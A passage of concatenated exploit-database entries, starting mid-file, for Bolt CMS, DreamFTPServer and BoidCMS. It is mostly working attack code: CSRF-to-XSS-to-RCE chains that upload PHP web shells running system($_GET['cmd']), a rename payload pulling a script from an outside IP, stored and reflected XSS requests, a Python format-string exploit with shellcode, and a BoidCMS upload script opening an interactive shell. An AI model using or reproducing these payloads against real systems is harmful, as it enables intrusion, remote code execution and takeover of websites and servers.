'%2C+the+editor+will+strip+out+%60%26nbsp%3B%60+characters.+If+set+to+\\\'true\\\'%2C+it+will+allow+them.+%C2%AF%5C_(%E3%83%84)_%2F%C2%AF%0D%0A%0D%0A%23+Bolt+uses+the+Google+maps+API+for+it\\\'s+geolocation+field+and+Google+now%0D%0A%23+requires+that+it+be+loaded+with+an+API+key+on+new+domains.+You+can+generate%0D%0A%23+a+key+at+https%3A%2F%2Fdevelopers.google.com%2Fmaps%2Fdocumentation%2Fjavascript%2Fget-api-key%0D%0A%23+and+enter+it+here+to+make+sure+that+the+geolocation+field+works.%0D%0A%23+google_api_key%3A%0D%0A%0D%0A%23+Global+option+to+enable%2Fdisable+the+live+editor%0D%0Aliveeditor%3A+false%0D%0A%0D%0A%23+Use+the+\\\'mailoptions\\\'+setting+to+configure+how+Bolt+sends+email%3A+using+\\\'smtp\\\'%0D%0A%23+or+PHP\\\'s+built-in+%60mail()%60-function.%0D%0A%0D%0A%23+Note+that+the+latter+might+_seem_+easier%2C+but+it\\\'s+been+disabled+by+a+lot+of%0D%0A%23+webhosts%2C+in+order+to+prevent+spam+from+wrongly+configured+scripts.+If+you+use%0D%0A%23+it%2C+your+mail+might+disappear+into+a+black+hole%2C+without+producing+any+errors.%0D%0A%23+Generally+speaking%2C+using+\\\'smtp\\\'+is+the+better+option%2C+so+use+that+if+possible.%0D%0A%23%0D%0A%23+Protip%3A+If+your+webhost+does+not+support+SMTP%2C+sign+up+for+a+(free)+Sparkpost%0D%0A%23+account+at+https%3A%2F%2Fwww.sparkpost.com%2Fpricing%2F+for+sending+emails+reliably.%0D%0A%23%0D%0A%23+The+mail+defaults+use+bolt%40yourhostname+with+the+site+title+as+a+default.%0D%0A%23+Override+this+with+the+senderName+and+senderMail+fields%0D%0A%0D%0A%23+mailoptions%3A%0D%0A%23+++++transport%3A+smtp%0D%0A%23+++++spool%3A+true%0D%0A%23+++++host%3A+localhost%0D%0A%23+++++port%3A+25%0D%0A%23+++++username%3A+username%0D%0A%23+++++password%3A+password%0D%0A%23+++++encryption%3A+null%0D%0A%23+++++auth_mode%3A+null%0D%0A%23+++++senderMail%3A+null%0D%0A%23+++++senderName%3A+null%0D%0A%0D%0A%23+mailoptions%3A%0D%0A%23+++++transport%3A+mail%0D%0A%23+++++spool%3A+false%0D%0A%0D%0A%23+Bolt+allows+some+modifications+to+how+\\\'strict\\\'+login+
sessions+are.+For+every%0D%0A%23+option+that+is+set+to+true%2C+it+becomes+harder+for+a+bad-willing+person+to%0D%0A%23+spoof+your+login+session.+However%2C+it+also+requires+you+to+re-authenticate%0D%0A%23+more+often+if+you+change+location(ip-address)+or+your+browser+has+frequent%0D%0A%23+upgrades.+Only+change+these+if+you+know+what+you\\\'re+doing%2C+and+you\\\'re+having%0D%0A%23+issues+with+the+default+settings.%0D%0A%23%0D%0A%23+Note%3A+If+you+change+any+of+these%2C+all+current+users+will+automatically+be%0D%0A%23+++++++logged+off.%0D%0Acookies_use_remoteaddr%3A+true%0D%0Acookies_use_browseragent%3A+false%0D%0Acookies_use_httphost%3A+true%0D%0A%0D%0A%23+The+length+of+time+a+user+stays+\\\'logged+in\\\'.+Change+to+0+to+end+the+session%0D%0A%23+when+the+browser+is+closed.%0D%0A%23%0D%0A%23+The+default+is+1209600+(two+weeks%2C+in+seconds).%0D%0Acookies_lifetime%3A+1209600%0D%0A%0D%0A%23+Set+the+session+cookie+to+a+specific+domain.+Leave+blank%2C+unless+you+know+what%0D%0A%23+you\\\'re+doing.%0D%0A%23%0D%0A%23+When+set+incorrectly%2C+you+might+not+be+able+to+log+on+at+all.%0D%0A%23%0D%0A%23+If+you\\\'d+like+it+to+be+valid+for+all+subdomains+of+\\\'www.example.org\\\'%2C+set+this%0D%0A%23+to+\\\'.example.org\\\'.%0D%0Acookies_domain%3A%0D%0A%0D%0A%23+The+hash_strength+determines+the+amount+of+iterations+for+encrypting%0D%0A%23+passwords.%0D%0A%23%0D%0A%23+A+higher+number+means+a+harder+to+decrypt+password%2C+but+takes+longer+to%0D%0A%23+compute.+\\\'8\\\'+is+the+minimum%2C+\\\'10\\\'+is+the+default%2C+\\\'12\\\'+is+better.%0D%0Ahash_strength%3A+10%0D%0A%0D%0A%23+Bolt+sets+the+%60X-Frame-Options%60+and+%60Frame-Options%60+to+%60SAMEORIGIN%60+by%0D%0A%23+default%2C+to+prevent+the+web+browser+from+rendering+an+iframe+if+origin%0D%0A%23+mismatch+(i.e.+iframe+source+refers+to+a+different+domain).%0D%0A%23%0D%0A%23+Setting+this+to+\\\'false\\\'%2C+will+prevent+the+setting+of+these+headers.%0D%0A%23+headers%3A%0D%0A%23+++++x_frame_options%3A+true%0D%0A%0D%0A%23+Bolt+uses+marke
t.bolt.cm+to+fetch+it\\\'s+extensions+by+default.+You+can%0D%0A%23+change+that+URL+here.%0D%0A%23%0D%0A%23+Do+not+change+this%2C+unless+you+know+what+you\\\'re+doing%2C+and+understand+the%0D%0A%23+associated+risks.+If+you+use+\\\'http%3A%2F%2Fmarket.bolt.cm\\\'%2C+Bolt+will+not+use%0D%0A%23+SSL%2C+increasing+the+risk+for+a+MITM+attacks.%0D%0A%23+extensions%3A%0D%0A%23+++++site%3A+\\\'https%3A%2F%2Fmarket.bolt.cm%2F\\\'%0D%0A%23+++++enabled%3A+true%0D%0A%23+++++composer%3A%0D%0A%23+++++++++minimum-stability%3A+stable++++++%23+Either+\\\'stable\\\'%2C+\\\'beta\\\'%2C+or+\\\'dev\\\'.+Setting+\\\'dev\\\'+will+allow+you+to+install+dev-master+versions+of+extensions.%0D%0A%23+++++++++prefer-stable%3A+true++++++++++++%23+Prefer+stable+releases+over+development+ones%0D%0A%23+++++++++prefer-dist%3A+true++++++++++++++%23+Forces+installation+from+package+dist+even+for+dev+versions.%0D%0A%23+++++++++prefer-source%3A+false+++++++++++%23+Forces+installation+from+package+sources+when+possible%2C+including+VCS+information.%0D%0A%23+++++++++config%3A%0D%0A%23+++++++++++++optimize-autoloader%3A+false+++++%23+Optimize+autoloader+during+autoloader+dump.%0D%0A%23+++++++++++++classmap-authoritative%3A+false++%23+Autoload+classes+from+the+classmap+only.+Implicitly+enables+%60optimize-autoloader%60.%0D%0A%0D%0A%23+Enforcing+the+use+of+SSL.+If+set%2C+all+pages+will+enforce+an+SSL+connection%2C%0D%0A%23+and+redirect+to+HTTPS+if+you+attempt+to+visit+plain+HTTP+pages.%0D%0A%23+enforce_ssl%3A+true%0D%0A%0D%0A%23+If+configured%2C+Bolt+will+trust+X-Forwarded-XXX+headers+from+the+listed+IP%0D%0A%23+addresses+and+ranges+when+determining+whether+the+current+request+is%0D%0A%23+\\\'secure\\\'.%0D%0A%23%0D%0A%23+This+is+required+to+correctly+determine+the+current+hostname+and+protocol%0D%0A%23+(HTTP+vs.+HTTPS)+when+running+behind+some+proxy%2C+e.g.+a+load+balancer%2C+cache%2C%0D%0A%23+or+SSL+proxy.%0D%0A%23%0D%0A%23+List+the+IP+addresses+or+subnets+that+you+know+are+such+proxies.%0D%0A%23%0D%0A%23+Note
%3A+Allowing+hosts+here+that+may+not+be+trusted+proxies+is+a+security+risk.%0D%0A%23+++++++If+you+do+not+understand+what+this+does%2C+it+is+probably+best+to+not%0D%0A%23+++++++touch+it.%0D%0A%23+trustProxies%3A%0D%0A%23+++++-+127.0.0.1%0D%0A%23+++++-+10.0.0.0%2F8%0D%0A%0D%0A%23+If+you+want+Bolt+installation+get+news+through+a+proxy%0D%0A%23+httpProxy%3A%0D%0A%23+++++host%3A+scheme%3A%2F%2Fmy.proxy.server%3Aport%0D%0A%23+++++user%3A+%5Busr%5D%0D%0A%23+++++password%3A+%5Bpwd%5D%0D%0A%0D%0A%23+Options+for+backend+user+interface%0D%0A%23+backend%3A%0D%0A%23++++news%3A%0D%0A%23++++++++disable%3A+true+++++%23+Disable+news+panel.+Defaults+to+false.+%22Alerts%22+will+still+be+shown.%0D%0A%23++++stack%3A%0D%0A%23++++++++disable%3A+true+++++%23+Disable+stack+usage.+Defaults+to+false.%0D%0A%0D%0A%23+Options+that+will+be+forced+in+next+major+version%0D%0Acompatibility%3A%0D%0A++++%23+Whether+to+return+TemplateView+instead+of+TemplateResponse+from+Controller%5CBase%3A%3Arender()%0D%0A++++%23+Response+methods+cannot+be+used+on+TemplateView+objects.%0D%0A++++%23+Setting+this+value+to+false+is+deprecated.%0D%0A++++template_view%3A+true%0D%0A++++%23+Set+to+\\\'false\\\'+to+enable+using+a+newer+version+of+the+setcontent+parser.%0D%0A++++setcontent_legacy%3A+true%0D%0A&file_edit%5Bsave%5D=undefined\\n\";\r\n" + 
          "            var aBody = new Uint8Array(body.length);\r\n" + 
          "            for (var i = 0; i \x3c aBody.length; i++)\r\n" + 
          "              aBody[i] = body.charCodeAt(i); \r\n" + 
          "            xhr.send(new Blob([aBody]));\r\n" + 
          "        }\r\n" + 
          "\r\n" + 
          "        function UploadShell() {\r\n" + 
          "            var xhr = new XMLHttpRequest();\r\n" + 
          "            xhr.open(\"POST\", bolt_admin_url + \"/upload\", true);\r\n" + 
          "            xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" + 
          "            xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" + 
          "            xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=---------------------------130713229751679908527494159\");\r\n" + 
          "            xhr.withCredentials = true;\r\n" + 
          "            var body = \"-----------------------------130713229751679908527494159\\r\\n\" + \r\n" + 
          "              \"Content-Disposition: form-data; name=\\\"files[]\\\"; filename=\\\"shell.php\\\"\\r\\n\" + \r\n" + 
          "              \"Content-Type: text/plain\\r\\n\" + \r\n" + 
          "              \"\\r\\n\" + \r\n" + 
          "              \"\\x3c?php echo(system($_GET[\\\'cmd\\\'])); ?\\x3e\\n\" + \r\n" + 
          "              \"\\r\\n\" + \r\n" + 
          "              \"-----------------------------130713229751679908527494159--\\r\\n\";\r\n" + 
          "            var aBody = new Uint8Array(body.length);\r\n" + 
          "            for (var i = 0; i \x3c aBody.length; i++)\r\n" + 
          "              aBody[i] = body.charCodeAt(i); \r\n" + 
          "            xhr.send(new Blob([aBody]));\r\n" + 
          "        }\r\n" + 
          "    }\r\n" + 
          "\r\n" + 
          "    exploit();\r\n" + 
          "\r\n" + 
          "\x3c/script\x3e\r\n" + 
          "\n" + 
          "\r\n" + 
          "-----------------------------130713229751679908527494159--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));

        setTimeout(function() {
            var dateObj = new Date();
            var folder = dateObj.getFullYear() + "-" + (String("00"+(dateObj.getMonth()+1)).slice(-2));
            document.getElementById('stager').src = target + "/files/"+folder+"/stager.html";
            console.log("Called stager! Wait a moment and access: " + target + "/files/" + folder + "/shell.php?cmd=whoami");
         }, 2000);

      }

      window.onload = function() {
        exploit();
      };

    </script>
     <iframe id="stager" style="width:0;height:0;border:0;border:none" src=""></iframe>
  </body>
</html>
            
# Exploit Title: Bolt CMS - 3.6.4 - Cross-Site Scripting
# Date: 2019-03-04
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://bolt.cm/
# Software Link : https://github.com/bolt/bolt
# Software : Bolt CMS - v 3.6.4
# Version : v 3.6.4
# Vulnerability Type : Cross-site Scripting
# Vulnerability : Stored XSS
# CVE : CVE-2019-9553

# A stored XSS vulnerability was discovered in the source code of the Bolt CMS web application, version 3.6.4.
 
# HTTP POST Request :
 
POST /bolt/editcontent/pages HTTP/1.1
Host: bolt-up3x24.bolt.dockerfly.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bolt-up3x24.bolt.dockerfly.com/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 562
DNT: 1
Connection: close
Cookie: bolt_session_5c201ab91521b607e364bc74271e51f1=3d540aa1d0a0fc38dde995dc6ba8a32e; bolt_authtoken_5c201ab91521b607e364bc74271e51f1=240049afe75abc53fbe51e75103ed138261da69b180ff241b7e815027c39f6fb
Upgrade-Insecure-Requests: 1

content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1
            
# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery
# Date: 2019-10-15
# Exploit Author: r3m0t3nu11[Zero-Way]
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.5
# Tested on: Linux
# CVE : CVE-2019-17591

# last version

# Csrf p0c
<html>
  <body>
  <head>
Bolt v 3.x exploit 0day
</head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src ="
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">

<script>
      function submitRequest()
      {
        Csrf = async () => {
        const xhr = new XMLHttpRequest();
        xhr.open("POST",
"http:\/\/127.0.0.1\/index.php\/async\/folder\/create",
true);
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type",
"application\/x-www-form-urlencoded; charset=UTF-8");
        xhr.withCredentials = true;
        var body = "parent=&foldername=sss&namespace=files";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
          xhr.send(new Blob([aBody]));
        xhr.onreadystatechange = async (e) => {
        if (xhr.readyState === 4 && xhr.status === 200){

};
 JSfuck1();
}

}
      JSfuck1 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/create",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "filename=aaa&parentPath=sss&namespace=files";
xhr.send(body1);
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){

}


};
where();
      }

      where = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/rename",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body2 =
"namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";
xhr.send(body2);

}
          Csrf();
      }
</script>
    <form action="#">
      <input type="button" value="Submit request"
onclick="submitRequest();" />
    </form>
  </body>
</html>

JS p0c

<script>
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "\/index.php\/bolt\/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);

}
};
xhr.send();
}



upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867\r\n" +
         "Content-Disposition: form-data; name=\"file_upload[select][]\";
filename=\"r3m0t3nu11.txt\"\r\n" +
          "Content-Type: text/plain\r\n" +
          "\r\n" +
          "<?php system($_GET['test']);?>\r\n" +
          "-----------------------------190530466613268610451083392867\r\n"
+
          "Content-Disposition: form-data;
name=\"file_upload[upload]\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------190530466613268610451083392867\r\n"
+
          "Content-Disposition: form-data;
name=\"file_upload[_token]\"\r\n" +
          "\r\n" +
          token

"-----------------------------190530466613268610451083392867--\r\n";

const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/bolt\/files", true);
xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
 xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
  Shell();
}

};

 var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));

}


Shell = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/file/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";
xhr.send(body1);
bypass();
}

bypass = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";
xhr.send(body1);
bypass2();
}

bypass2 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";
xhr.send(body1);

}



Token();
</script>


version 6.5

CSrf p0c
<html>
  <body>
<head>
Bolt v 3.x CVE-2019-17591 exploit
</head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src ="
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">

<script>
      function submitRequest()
      {
        Csrf = async () => {
        const xhr = new XMLHttpRequest();
        xhr.open("POST",
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/create",
true);
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type",
"application\/x-www-form-urlencoded; charset=UTF-8");
        xhr.withCredentials = true;
        var body = "filename=test&parentPath=&namespace=files";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
          xhr.send(new Blob([aBody]));
        xhr.onreadystatechange = async (e) => {
        if (xhr.readyState === 4 && xhr.status === 200){
          JSfuck();
}
};


}
      JSfuck = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/rename",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "namespace=files&parent=&oldname=test&newname=<img src='x'
onerror=alert(1)>";
xhr.send(body1);

}
          Csrf();
      }
</script>
    <form action="#">
      <input type="button" value="Submit request"
onclick="submitRequest();" />
    </form>
  </body>
</html>

Js p0c


<script>
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "\/bolt\/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);

}


}
xhr.send(null);
}



upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867\r\n" +
         "Content-Disposition: form-data; name=\"file_upload[select][]\";
filename=\"r3m0t3nu11.txt\"\r\n" +
          "Content-Type: text/plain\r\n" +
          "\r\n" +
          "<?php system($_GET['test']);?>\r\n" +
          "-----------------------------190530466613268610451083392867\r\n"
+
          "Content-Disposition: form-data;
name=\"file_upload[upload]\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------190530466613268610451083392867\r\n"
+
          "Content-Disposition: form-data;
name=\"file_upload[_token]\"\r\n" +
          "\r\n" +
          token

"-----------------------------190530466613268610451083392867--\r\n";

const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/bolt\/files", true);
xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
      var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
}




Shell = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/\/async\/file\/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 =
"namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";
xhr.send(body1);
}
Token();
</script>

proof of concept :

https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing

https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing

Greetz to :
Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red
Virus,m7md1337,D3vil1337,and all my friends
            
# Exploit Title: Bolt CMS <3.6.2 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-12-18
# Exploit Author: Raif Berkay Dincel [ author=9567 ]
# Contact: www.raifberkaydincel.com
# Vendor Homepage: bolt.cm 
# Vulnerable Software --> [ https://github.com/rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting/raw/master/bolt-v3.6.2.zip ]
# Affected Version: [ < 3.6.2 ]
# CVE-ID: CVE-2018-19933
# Tested on: Parrot Security OS / Linux Mint / Windows 10

# Vulnerable Parameter Type: POST 
# Vulnerable Parameter: http://127.0.0.1:8000/preview/page
# Attack Pattern: <script>alert("Raif")</script> 

# Description

Bolt CMS <3.6.2 allows XSS via text input when the preview button is clicked, as demonstrated by the Title field of a configured new entry.

# PoC [Video]: https://youtu.be/3eTPyIpjCJg
 
# Proof of Concepts:
 
POST /preview/page HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 396
Connection: close
Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04
Upgrade-Insecure-Requests: 1

content_edit%5B_token%5D=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&editreferrer=&contenttype=pages&title=%3Cscript%3Ealert%28%22Raif%22%29%3C%2Fscript%3E&slug=script-alert-raif-script&image%5Bfile%5D=&files%5B%5D=&teaser=&body=&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2018-12-07+00%3A12%3A05&datedepublish=&ownerid=1&_live-editor-preview=
            
import socket
import os
import sys

print '''

                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScrR1pTK1dd13.slammer@gmail.com   # 
                ##############################################

# Exploit Title: DreamFTPServer1.0.2_RETR_command_format_string_remotecodevuln
# Date: 2016.11.04
# Exploit Author: Greg Priest
# Version: DreamFTPServer1.0.2
# Tested on: Windows7 x64 HUN/ENG Professional
'''

ip = raw_input("Target ip: ")
port = 21
overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901071x%n%8x%8x%24954x%n%x%x%x%n'
nop = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
#overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901090x%n%8x%8x%24954x%n%x%x%x%n\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'

#shellcode calc.exe
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")

remotecode = overflow + nop + shellcode + '\r\n'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((ip ,port))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASSW hacker@hacker.net\r\n')
s.recv(1024)
print remotecode
print '''
Successfull Exploitation!
'''
message = 'RETR ' + remotecode 
s.send(message)
s.recv(1024)
s.close()
            
#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836

import requests
import re
import argparse

parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url=args.url
user=args.user
passwd=args.passwd

def showhelp():
	parser.print_help()
	exit()
if base_url == None: showhelp()
elif user == None: showhelp()
elif passwd == None: showhelp()

with requests.Session() as s:
	req=s.get(f'{base_url}/admin')
	token=re.findall('[a-z0-9]{64}',req.text)
	form_login_data={
		"username":user,
		"password":passwd,
		"login":"Login",
	}
	form_login_data['token']=token
	s.post(f'{base_url}/admin',data=form_login_data)
	#=========== File upload to RCE
	req=s.get(f'{base_url}/admin?page=media')
	token=re.findall('[a-z0-9]{64}',req.text)
	form_upld_data={
		"token":token,
		"upload":"Upload"
	}
	#==== php shell
	php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
	with open('shell.php','w') as f:
		f.writelines(php_code)
	#====
	file = {'file' : open('shell.php','rb')}
	s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
	req=s.get(f'{base_url}/media/shell.php')
	if req.status_code == 404:
		print("Upload failed")
		exit()
	print(f'Shell uploaded to "{base_url}/media/shell.php"')
	while 1:
		cmd=input("cmd >> ")
		if cmd=='exit': exit()
		req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
		print(req.text)
            
